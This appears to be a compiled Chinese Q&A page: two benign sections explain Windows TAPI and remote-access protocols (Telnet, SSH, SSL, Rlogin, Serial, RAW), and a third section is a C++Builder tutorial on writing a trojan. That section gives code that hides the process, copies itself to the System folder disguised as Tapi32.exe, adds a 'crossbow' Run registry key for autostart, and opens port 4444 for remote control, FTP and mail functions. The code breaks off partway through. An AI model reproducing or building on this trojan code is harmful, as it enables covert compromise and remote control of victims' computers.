tapi編程

A. 電腦系統Telephony用於支持電話功能或者網路控制，電話設備，怎麼理解

Telephony 服務為電話應用程序編程介面 (TAPI) 提供支持。 TAPI 將遠程通信與操作系統集成。 TAPI 同時支持傳統和 IP 電話服務，以提供聲音、數據和視頻通信。 受支持的硬體包括聲音和視頻卡、數據機、ISDN 線路、ATM 網路和相機。 通過使用此硬體，您可以通過直接連接到本地計算機、電話線、LAN、WAN 和 Internet 以進行通信。

除了撥打和接聽電話外，程序可以使用 TAPI 提供增強的電話功能（例如來電顯示、電話路由、語音郵件和視頻會議）。 通信程序可以根據客戶信息識別呼叫者、重撥和顯示呼叫者信息，甚至優先處理或路由來電。

不建議停止並禁用此項系統服務~

如對你有幫助~還請及時採納~

B. Serial SSH Rlogin Telnet Raw分別是什麼協議

一、Telnet
使用Telnet用來訪問遠程計算機的TCP/IP協議以控制你的網路設備,相當於在離開某個建築時大喊你的用戶名和口令。很快會有人進行監聽， 並且他們會利用你安全意識的缺乏。傳統的網路服務程序如：ftp、pop和telnet在本質上都是不安全的，因為它們在網路上用明文傳送口令和數據，別 有用心的人非常容易就可以截獲這些口令和數據。而且，這些服務程序的安全驗證方式也是有其弱點的，就是很容易受到「中間人」（man-in-the- middle）這種方式的攻擊。所謂「中間人」的攻擊方式，就是「中間人」冒充真正的伺服器接收你的傳給伺服器的數據，然後再冒充你把數據傳給真正的服務 器。伺服器和你之間的數據傳送被「中間人」一轉手做了手腳之後，就會出現很嚴重的問題。
Telnet協議是TCP/IP協議族中的一員，是Internet遠程登陸服務的標准協議和主要方式。它為用戶提供了在本地計算機上完成 遠程主機工作的能力。在終端使用者的電腦上使用telnet程序，用它連接到伺服器。終端使用者可以在telnet程序中輸入命令，這些命令會在伺服器上 運行，就像直接在伺服器的控制台上輸入一樣。可以在本地就能控制伺服器。要開始一個telnet會話，必須輸入用戶名和密碼來登錄伺服器。Telnet是 常用的遠程式控制制Web伺服器的方法.
Telnet遠程登錄服務分為以下4個過程：
1）本地與遠程主機建立連接。該過程實際上是建立一個TCP連接，用戶必須知道遠程主機的Ip地址或域名；
2）將本地終端上輸入的用戶名和口令及以後輸入的任何命令或字元以NVT（Net Virtual Terminal）格式傳送到遠程主機。該過程實際上是從本地主機向遠程主機發送一個IP數據包；
3）將遠程主機輸出的NVT格式的數據轉化為本地所接受的格式送回本地終端，包括輸入命令回顯和命令執行結果；
4）最後，本地終端對遠程主機進行撤消連接。該過程是撤銷一個TCP連接。
二、SSH
SSH 為 Secure Shell 的縮寫，由 IETF 的網路工作小組（Network Working Group）所制定；SSH 為建立在應用層和傳輸層基礎上的安全協議。SSH 是目前較可靠，專為遠程登錄會話和其他網路服務提供安全性的協議。利用 SSH 協議可以有效防止遠程管理過程中的信息泄露問題。SSH是替代Telnet和其他遠程式控制制台管理應用程序的行業標准。SSH命令是加密的並以幾種方式進行保密。SSH有很多功能，它既可以代替 telnet，又可以為ftp、pop、甚至ppp提供一個安全的「通道」。SSH(Secure SHell)到目前為止有兩個不兼容的版本——SSH1和SSH2。
SSH1又分為1.3和1.5兩個版本。SSH1採用DES、3DES、Blowfish和RC4等對稱加密演算法保護數據安全傳輸，而對稱加密演算法的密鑰 是通過非對稱加密演算法（RSA）來完成交換的。SSH1使用循環冗餘校驗碼（CRC）來保證數據的完整性，但是後來發現這種方法有缺陷。
SSH2避免了RSA的專利問題，並修補了CRC的缺陷。SSH2用數字簽名演算法（DSA）和Diffie-Hellman（DH）演算法代替RSA來完成對稱密鑰的交換，用消息證實代碼（HMAC）來代替CRC。同時SSH2增加了AES和Twofish等對稱加密演算法。
三、Telnet/SSL
Secure Socket Layer，為Netscape所研發，用以保障在Internet上數據傳輸之安全，利用數據加密(Encryption)技術，可確保數據在網路上之傳輸過程中不會被截取及竊聽。目前一般通用之規格為40 bit之安全標准，美國則已推出128 bit之更高安全標准，但限制出境。只要3.0版本以上之I.E.或Netscape瀏覽器即可支持SSL。
當前版本為3.0。它已被廣泛地用於Web瀏覽器與伺服器之間的身份認證和加密數據傳輸。
SSL協議位於TCP/IP協議與各種應用層協議之間，為數據通訊提供安全支持。SSL協議可分為兩層： SSL記錄協議（SSL Record Protocol）：它建立在可靠的傳輸協議（如TCP）之上，為高層協議提供數據封裝、壓縮、加密等基本功能的支持。 SSL握手協議（SSL Handshake Protocol）：它建立在SSL記錄協議之上，用於在實際的數據傳輸開始前，通訊雙方進行身份認證、協商加密演算法、交換加密密鑰等。
SSL協議提供的服務主要有：
1）認證用戶和伺服器，確保數據發送到正確的客戶機和伺服器；
2）加密數據以防止數據中途被竊取；
3）維護數據的完整性，確保數據在傳輸過程中不被改變。
SSL(Secure Sockets Layer安全套接層),及其繼任者傳輸層安全（Transport Layer Security，TLS）是為網路通信提供安全及數據完整性的一種安全協議,是基於證書的認證。
Telnet/SSL是帶有SSL的Telnet。
四、Rlogin
Rlogin起源於伯克利Unix，開始它只能工作在Unix系統之間，現在已經可以在其他操作系統上運行。Rlogin和Telnet功能用法相似，但是簡單很多。下圖顯示了伯克利不同版本的Telnet和Rlogin客戶進程和伺服器進程源代碼的數量，就可以知道兩者的復雜程度。

現在，不斷有新的Telnet選項被添加到Telnet中去，這就使得Telnet實現的源代碼數量大大增加，而Rlogin依然變化不大，還是比較簡單。
五、Serial
串列指每次一個事件，它通常跟並行即一次發生多個事件相反。在數據傳輸中，常常用到時分和空分技術，串列發送信息中的單個位的傳輸在時間上隔開，而在並行發送多個位的情況下使用空間（在多個線路或者路徑）分隔。
在計算機硬體和數據傳輸：串列連接、操作以及媒質通常意味著比較慢而簡單得操作，而並行意味著較快的操作。這種暗示並不總是正確的，因為串列媒質（例如，光纖電纜）可遠遠快於並行傳輸多個信號的媒質。 在PC中，列印機通常通過並行介面和電纜連接，從而能夠較快的列印。鍵盤和滑鼠只需要串列介面和線路。 傳統計算機及其程序常常是串列工作，計算機逐個地讀取程序並執行其指令，然而，一些現代計算機具有多個處理器，可並行執行指令。
六、TAPI
TAPI是電話應用編程介面（telephONe Application Programming Interface）的縮寫。它可以使用戶在電腦上通過電話或視頻電話與電話另一端的人進行交談。開發人員使用TAPI編寫的應用程序能有效的利用電話業務供應商的服務，既可以通過一個模擬Modem對其進行訪問，也可以訪問專業的用戶交換機（PBX）所提供的高級功能。
電腦上安裝了TAPI，並且你安裝了正確的應用程序和硬體設備，那麼你就可以實現：
1.可以看到與你談話的人
2.點擊某人的照片即可實現通話
3.可以在你發送的e-mail中添加語音文件，也可收聽你接收的e-mail中的語音文件。
4.使用類似圖形用戶界面（GUI）來建立一個會議電話，然後准時參加會議。
5.發送和接收傳真
6.可以編寫程序控制電腦自動接聽某個號碼的來電
7.攜帶型無線手機
七、RAW
RAW協議是大多數列印設備的默認協議。為了發送 RAW 格式的作業，列印伺服器將打開一個針對列印機網路介面的 TCP 流。對於許多設備來說，這個介面將是埠 9100。在創建 TCP/IP埠之後，Windows將按照RFC 1759（Printer MIB），使用SNMP來查詢設備的對象標識符（Object Identifier，OID）。如果設備返回了一個值，則解析系統文件tcpmon.ini來尋找匹配項。如果列印機製造商提供了特定設備的特殊配置信 息，則這些配置信息已經連同配置設置一起創建就緒。例如，有些外部列印伺服器介面支持多台列印機（例如，具有3個並行埠連接的Hewlett Packard JetDirect EX）。製造商可以使用不同的埠來指明應該將某項作業提交給哪台列印機（例如，將作業9102提交給埠1，將作業9103提交給埠2等等）。這一功 能對於需要使用特殊埠名稱的列印伺服器介面有所裨益，比如：某些IBM網路列印機上的PASS埠。

C. 簡單的木馬怎麼編寫啊

特洛依木馬這個名詞大家應該不陌生，自從98年「死牛崇拜」黑客小組公布Back Orifice以來，木馬猶如平地上的驚雷， 使在Dos——Windows時代中長大的中國網民從五彩繽紛的網路之夢中驚醒，終於認識到的網路也有它邪惡的一面，一時間人心惶惶。

我那時在《電腦報》上看到一篇文章，大意是一個菜鳥被人用BO控制了，嚇得整天吃不下飯、睡不著覺、上不了網，到處求救！要知道，木馬（Trojan）的歷史是很悠久的：早在AT&T Unix和BSD Unix十分盛行的年代，木馬是由一些玩程式（主要是C）水平很高的年輕人（主要是老美）用C或Shell語言編寫的，基本是用來竊取登陸主機的口令，以取得更高的許可權。那時木馬的主要方法是誘騙——先修改你的.profile文件，植入木馬；當你登陸時將你敲入的口令字元存入一個文件，用Email的形式發到攻擊者的郵箱里。國內的年輕人大都是在盜版Dos的熏陶下長大的，對網路可以說很陌生。直到Win9x橫空出世，尤其是WinNt的普及，大大推動了網路事業的發展的時候，BO這個用三年後的眼光看起來有點簡單甚至可以說是簡陋的木馬（甚至在Win9x的「關閉程序」對話框可以看到進程）給了當時中國人極大的震撼，它在中國的網路安全方面可以說是一個劃時代的軟體。

自己編寫木馬，聽起來很Cool是不是？！木馬一定是由兩部分組成——伺服器程序（Server）和客戶端程序（Client），伺服器負責打開攻擊的道路，就像一個內奸特務；客戶端負責攻擊目標，兩者需要一定的網路協議來進行通訊（一般是TCP/IP協議）。為了讓大家更好的了解木馬攻擊技術，破除木馬的神秘感，我就來粗略講一講編寫木馬的技術並順便編寫一個例子木馬，使大家能更好地防範和查殺各種已知和未知的木馬。

首先是編程工具的選擇。目前流行的開發工具有C++Builder、VC、VB和Delphi，這里我們選用C++Builder（以下簡稱BCB）；VC雖然好，但GUI設計太復雜，為了更好地突出我的例子，集中注意力在木馬的基本原理上，我們選用可視化的BCB；Delphi也不錯，但缺陷是不能繼承已有的資源（如「死牛崇拜」黑客小組公布的BO2000源代碼，是VC編寫的，網上俯拾皆是）；VB嘛，談都不談——難道你還給受害者傳一個1兆多的動態鏈接庫——Msvbvm60.dll嗎？
啟動C++Builder 5.0企業版，新建一個工程，添加三個VCL控制項：一個是Internet頁中的Server Socket，另兩個是Fastnet頁中的NMFTP和NMSMTP。Server Socket的功能是用來使本程序變成一個伺服器程序，可以對外服務（對攻擊者敞開大門）。Socket最初是在Unix上出現的，後來微軟將它引入了Windows中（包括Win98和WinNt）；後兩個控制項的作用是用來使程序具有FTP（File Transfer Protocol文件傳輸協議）和SMTP（Simple Mail Transfer Protocol簡單郵件傳輸協議）功能，大家一看都知道是使軟體具有上傳下載功能和發郵件功能的控制項。

Form窗體是可視的，這當然是不可思議的。不光佔去了大量的空間（光一個Form就有300K之大），而且使軟體可見，根本沒什麼作用。因此實際寫木馬時可以用一些技巧使程序不包含Form，就像Delphi用過程實現的小程序一般只有17K左右那樣。

我們首先應該讓我們的程序能夠隱身。雙擊Form，首先在FormCreate事件中添加可使木馬在Win9x的「關閉程序」對話框中隱藏的代碼。這看起來很神秘，其實說穿了不過是一種被稱之為Service的後台進程,它可以運行在較高的優先順序下,可以說是非常靠近系統核心的設備驅動程序中的那一種。因此，只要將我們的程序在進程資料庫中用RegisterServiceProcess（）函數注冊成服務進程（Service Process）就可以了。不過該函數的聲明在Borland預先打包的頭文件中沒有，那麼我們只好自己來聲明這個位於KERNEL32.DLL中的鳥函數了。

首先判斷目標機的操作系統是Win9x還是WinNt：

{
DWORD dwVersion = GetVersion（）;
// 得到操作系統的版本號
if （dwVersion >= 0x80000000）
// 操作系統是Win9x，不是WinNt
{
typedef DWORD （CALLBACK* LPREGISTERSERVICEPROCESS）（DWORD,DWORD）;
//定義RegisterServiceProcess（）函數的原型
HINSTANCE hDLL;
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
hDLL = LoadLibrary（"KERNEL32"）;
//載入RegisterServiceProcess（）函數所在的動態鏈接庫KERNEL32.DLL
lpRegisterServiceProcess = （LPREGISTERSERVICEPROCESS）GetProcAddress（hDLL,"RegisterServiceProcess"）;
//得到RegisterServiceProcess（）函數的地址
lpRegisterServiceProcess（GetCurrentProcessId（）,1）;
//執行RegisterServiceProcess（）函數,隱藏本進程
FreeLibrary（hDLL）;
//卸載動態鏈接庫
}
}

這樣就終於可以隱身了（害我敲了這么多代碼！）。為什麼要判斷操作系統呢？因為WinNt中的進程管理器可以對當前進程一覽無余，因此沒必要在WinNt下也使用以上代碼（不過你可以使用其他的方法，這個留到後面再講）。
接著再將自己拷貝一份到%System%目錄下，例如：C:\Windows\System，並修改注冊表，以便啟動時自動載入：

{
char TempPath[MAX_PATH];
//定義一個變數
GetSystemDirectory（TempPath ,MAX_PATH）;
//TempPath是system目錄緩沖區的地址,MAX_PATH是緩沖區的大小，得到目標機的System目錄路徑
SystemPath=AnsiString（TempPath）;
//格式化TempPath字元串，使之成為能供編譯器使用的樣式
CopyFile（ParamStr（0）.c_str（）, AnsiString（SystemPath+"\\Tapi32.exe"）.c_str（） ,FALSE）;
//將自己拷貝到%System%目錄下，並改名為Tapi32.exe，偽裝起來
Registry=new TRegistry;
//定義一個TRegistry對象，准備修改注冊表，這一步必不可少
Registry->RootKey=HKEY_LOCAL_MACHINE;
//設置主鍵為HKEY_LOCAL_MACHINE
Registry->OpenKey（"Software\\Microsoft\\Windows\\
CurrentVersion\\Run",TRUE）;
//打開鍵值Software\\Microsoft\\Windows\\CurrentVersion\\Run，如果不存在，就創建之
try
{
//如果以下語句發生異常，跳至catch，以避免程序崩潰
if（Registry->ReadString（"crossbow"）!=SystemPath+"\\Tapi32.exe"）
Registry->WriteString（"crossbow",SystemPath+"\\Tapi32.exe"）;
//查找是否有「crossbow」字樣的鍵值，並且是否為拷貝的目錄%System%+Tapi32.exe
//如果不是，就寫入以上鍵值和內容
}
catch（...）
{
//如果有錯誤，什麼也不做
}
}

好，FormCreate過程完成了，這樣每次啟動都可以自動載入Tapi32.exe，並且在「關閉程序」對話框中看不見本進程了，木馬的雛形初現。

接著選中ServerSocket控制項，在左邊的Object Inspector中將Active改為true，這樣程序一啟動就打開特定埠，處於伺服器工作狀態。再將Port填入4444，這是木馬的埠號，當然你也可以用別的。但是你要注意不要用1024以下的低端埠，因為這樣不但可能會與基本網路協議使用的埠相沖突，而且很容易被發覺，因此盡量使用1024以上的高端埠（不過也有這樣一種技術，它故意使用特定埠，因為如果引起沖突，Windows也不會報錯 ^_^）。你可以看一看TNMFTP控制項使用的埠，是21號埠，這是FTP協議的專用控制埠（FTP Control Port）；同理TNMSMTP的25號埠也是SMTP協議的專用埠。

再選中ServerSocket控制項，點擊Events頁，雙擊OnClientRead事件，敲入以下代碼：

{
FILE *fp=NULL;
char * content;
int times_of_try;
char TempFile[MAX_PATH];
//定義了一堆待會兒要用到的變數
sprintf（TempFile, "%s%2